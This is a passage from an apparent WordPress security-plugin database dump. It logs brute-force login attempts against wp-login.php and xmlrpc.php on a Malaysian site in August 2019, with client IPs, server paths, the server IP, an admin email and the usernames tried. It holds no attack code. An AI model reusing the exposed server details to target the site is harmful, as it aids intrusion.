empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"93.113.111.97\";s:11:\"REMOTE_PORT\";s:5:\"45738\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWP8qTzAXRCh@i15RK1BrQAAAMg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566833833.4831\";s:12:\"REQUEST_TIME\";s:10:\"1566833833\";}}','notice','2019-08-26 15:37:15','2019-08-26 15:37:14',18198920,19496736,'https://bintara.com.my/xmlrpc.php',1,0,'93.113.111.97'),(23156,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"18.228.224.94\";s:11:\"REMOTE_PORT\";s:5:\"25529\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQBboRetx8xvefGxXo7PQAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566835054.5416\";s:12:\"REQUEST_TIME\";s:10:\"1566835054\";}}','notice','2019-08-26 15:57:37','2019-08-26 15:57:35',17768792,19259080,'https://bintara.com.my/wp-login.php',1,0,'18.228.224.94'),(23157,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"199.114.216.133\";s:11:\"REMOTE_PORT\";s:5:\"40134\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQBfIRetx8xvefGxXo7QAAAAEA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566835068.4642\";s:12:\"REQUEST_TIME\";s:10:\"1566835068\";}}','notice','2019-08-26 15:57:49','2019-08-26 15:57:48',17684344,19176544,'https://bintara.com.my/wp-login.php',1,0,'199.114.216.133'),(23158,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"181.118.146.67\";s:11:\"REMOTE_PORT\";s:5:\"50356\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQIzaEJCIAoIkQh@WdlswAAAAs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566836941.8204\";s:12:\"REQUEST_TIME\";s:10:\"1566836941\";}}','notice','2019-08-26 16:29:03','2019-08-26 16:29:02',17684648,19175760,'https://bintara.com.my/wp-login.php',1,0,'181.118.146.67'),(23159,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"181.118.146.67\";s:11:\"REMOTE_PORT\";s:5:\"51168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQI0TzAXRCh@i15RK1DAwAAAMo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566836945.4207\";s:12:\"REQUEST_TIME\";s:10:\"1566836945\";}}','notice','2019-08-26 16:29:07','2019-08-26 16:29:05',18199960,19497648,'https://bintara.com.my/xmlrpc.php',1,0,'181.118.146.67'),(23160,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"51.38.36.15\";s:11:\"REMOTE_PORT\";s:5:\"54342\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQJbL1aWYDq8nYusQUUkQAAARM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566837101.0656\";s:12:\"REQUEST_TIME\";s:10:\"1566837101\";}}','notice','2019-08-26 16:31:42','2019-08-26 16:31:41',17682440,19173360,'https://bintara.com.my/wp-login.php',1,0,'51.38.36.15'),(23161,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.237.52.230\";s:11:\"REMOTE_PORT\";s:5:\"37952\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQNFb1aWYDq8nYusQUYgAAAARg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566838037.9127\";s:12:\"REQUEST_TIME\";s:10:\"1566838037\";}}','notice','2019-08-26 16:47:19','2019-08-26 16:47:18',17685576,19176200,'https://bintara.com.my/wp-login.php',1,0,'212.237.52.230'),(23162,0,'brute_force','invalid-login::username-patricia','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:8:\"patricia\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"476\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.237.52.230\";s:11:\"REMOTE_PORT\";s:5:\"38115\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQNGbLuw7edOKpgf7CM4AAAAJc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566838041.615\";s:12:\"REQUEST_TIME\";s:10:\"1566838041\";}}','notice','2019-08-26 16:47:22','2019-08-26 16:47:21',18198536,19494584,'https://bintara.com.my/xmlrpc.php',1,0,'212.237.52.230'),(23163,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.128.53\";s:11:\"REMOTE_PORT\";s:5:\"52794\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQPIElLQKVpx7Mms7vO2wAAAcw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566838560.6373\";s:12:\"REQUEST_TIME\";s:10:\"1566838560\";}}','notice','2019-08-26 16:56:03','2019-08-26 16:56:01',17684368,19175416,'https://bintara.com.my/wp-login.php',1,0,'206.189.128.53'),(23164,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 